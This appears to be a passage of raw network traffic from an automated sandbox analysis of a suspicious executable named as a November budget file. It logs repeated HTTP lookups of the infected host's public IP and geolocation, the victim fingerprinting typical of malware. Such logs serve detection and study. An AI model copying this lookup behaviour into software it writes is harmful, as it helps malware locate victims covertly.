                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: 45170f0ee9385ffa5eccd02e9b43fff0
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.1149855132.226.247.73807336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 31, 2024 10:35:30.255770922 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 31, 2024 10:35:31.142432928 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:31 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: 8bd9ca52cafc6ce01aa995de96eb0f05
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.1149867132.226.247.73807336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 31, 2024 10:35:32.003972054 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 31, 2024 10:35:32.869249105 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:32 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: 5158c928c45fb82e164856706165f99b
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.1149774188.114.97.34437336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-31 09:35:17 UTC87OUTGET /xml/173.254.250.77 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-31 09:35:18 UTC1218INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:17 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 359
                                                                                            Connection: close
                                                                                            x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710
                                                                                            x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0
                                                                                            x-cache: Miss from cloudfront
                                                                                            via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront)
                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                            x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew==
                                                                                            Cache-Control: max-age=31536000
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 4192
                                                                                            Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wo6mA8OXkWQcS8YPcZ9Sn17t9RSsJXTuRnOc%2BJhMlnsZtbqT4lpglm%2FQfyXXPOgzXewst3E1JiUFtEQYSI4tC0P%2BMSaHgQ4tF6%2FfhFMnAD21oQoUkUcpdHge9dNjdvi2OPmfFjrn"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8db2a7794a5c4654-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1183&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2452159&cwnd=242&unsent_bytes=0&cid=17f7320747019e24&ts=222&x=0"
                                                                                            2024-10-31 09:35:18 UTC151INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e
                                                                                            Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
                                                                                            2024-10-31 09:35:18 UTC208INData Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                            Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.1149780188.114.97.34437336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-31 09:35:18 UTC63OUTGET /xml/173.254.250.77 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            2024-10-31 09:35:19 UTC1218INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:19 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 359
                                                                                            Connection: close
                                                                                            x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710
                                                                                            x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0
                                                                                            x-cache: Miss from cloudfront
                                                                                            via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront)
                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                            x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew==
                                                                                            Cache-Control: max-age=31536000
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 4193
                                                                                            Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ue1DcCJGQZ9Z6Ph3vROyXXzsxOjt%2BDg5uVliNVx701L%2BBaLxeQ8LTw3L24OGtWPXwUCUg9ncHlnNPtyqHSGNUL2TRA1jSUIVuO%2FiBT2KZrWtaPG767%2BibBv9PdawKHJfRnI4pUGc"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8db2a77fafcf28e0-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1516&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1875647&cwnd=251&unsent_bytes=0&cid=41d0111fc41e61af&ts=157&x=0"
                                                                                            2024-10-31 09:35:19 UTC151INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e
                                                                                            Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
                                                                                            2024-10-31 09:35:19 UTC208INData Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                            Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.1149792188.114.97.34437336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-31 09:35:20 UTC87OUTGET /xml/173.254.250.77 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-31 09:35:20 UTC1222INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:20 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 359
                                                                                            Connection: close
                                                                                            x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710
                                                                                            x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0
                                                                                            x-cache: Miss from cloudfront
                                                                                            via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront)
                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                            x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew==
                                                                                            Cache-Control: max-age=31536000
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 4195
                                                                                            Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NuDu9sRDtnpkZgxcpd%2Fm4d0MMMul0h5xoFLo5ryZKLA9Tpc5%2B29%2Fd70OBDKDH1F0S%2FYDCNvwK8yMcbOb%2F0Fp42gaEPVnlAbOjPShWgYklChGCANrYBF0im30aweWAnjZ%2BJpUSECA"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8db2a789fcf26c0a-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1235&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2255451&cwnd=250&unsent_bytes=0&cid=b7fddb010591c1d2&ts=148&x=0"
                                                                                            2024-10-31 09:35:20 UTC147INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e
                                                                                            Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionN
                                                                                            2024-10-31 09:35:20 UTC212INData Raw: 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                            Data Ascii: ame>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.1149809188.114.97.34437336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-31 09:35:23 UTC87OUTGET /xml/173.254.250.77 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-31 09:35:23 UTC1224INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:23 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 359
                                                                                            Connection: close
                                                                                            x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710
                                                                                            x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0
                                                                                            x-cache: Miss from cloudfront
                                                                                            via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront)
                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                            x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew==
                                                                                            Cache-Control: max-age=31536000
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 4198
                                                                                            Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FV3kysiQ0rLBip8k79SOYuciG22ed8x%2BYKNwUzCa%2Fnz8bYO%2B6q%2B0d3kXq4wnv3rNjheTA80B1SfUXBpEU1bojK9uQi8G2fWeY6dMx09cg5yGIVlKEVmW%2FsS4HWa2gX%2BxToeHIB3e"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8db2a79a5f2ce70a-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2359&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1187371&cwnd=243&unsent_bytes=0&cid=f7523cbd232a5d28&ts=145&x=0"
                                                                                            2024-10-31 09:35:23 UTC145INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f
                                                                                            Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Regio
                                                                                            2024-10-31 09:35:23 UTC214INData Raw: 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                            Data Ascii: nName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.1149819188.114.97.34437336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-31 09:35:24 UTC87OUTGET /xml/173.254.250.77 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-31 09:35:24 UTC1226INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:24 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 359
                                                                                            Connection: close
                                                                                            x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710
                                                                                            x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0
                                                                                            x-cache: Miss from cloudfront
                                                                                            via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront)
                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                            x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew==
                                                                                            Cache-Control: max-age=31536000
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 4199
                                                                                            Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41IP4CpINih8yTEISEyeXU9AJKV7XuQqgCbCGu81%2F4XPu8%2F%2BriI7SA7%2FYEkPV%2FdWOGojt%2FLtKKGbq6kEdUNxYCKMljPYi6B0dYsHbZ2BRt%2BPTKyI8ZmsOhgX%2FT8Dcmq4Uk0lEXu5"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8db2a7a46a5f2e7f-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1889106&cwnd=233&unsent_bytes=0&cid=d896b1814bc936fc&ts=149&x=0"
                                                                                            2024-10-31 09:35:24 UTC143INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67
                                                                                            Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Reg
                                                                                            2024-10-31 09:35:24 UTC216INData Raw: 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                            Data Ascii: ionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.1149828188.114.97.34437336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-31 09:35:26 UTC87OUTGET /xml/173.254.250.77 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-31 09:35:26 UTC1210INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:26 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 359
                                                                                            Connection: close
                                                                                            x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710
                                                                                            x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0
                                                                                            x-cache: Miss from cloudfront
                                                                                            via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront)
                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                            x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew==
                                                                                            Cache-Control: max-age=31536000
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 4201
                                                                                            Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0E1zVuEL8jEimWXBOsjbobOSnecHvPLXeIl1zunUSZfAb5ZQhq4AUmBfcdWckiASo5CZpQJipKHVcvPev4OakLCaLfSRtCKoQbsu7Wn7eTqMAXUWoSnjov61kWqWNZ34SZZUqDYE"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8db2a7aebb2f4869-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1095&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2637522&cwnd=251&unsent_bytes=0&cid=62e2bb1ee9bfaba2&ts=147&x=0"
                                                                                            2024-10-31 09:35:26 UTC159INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52
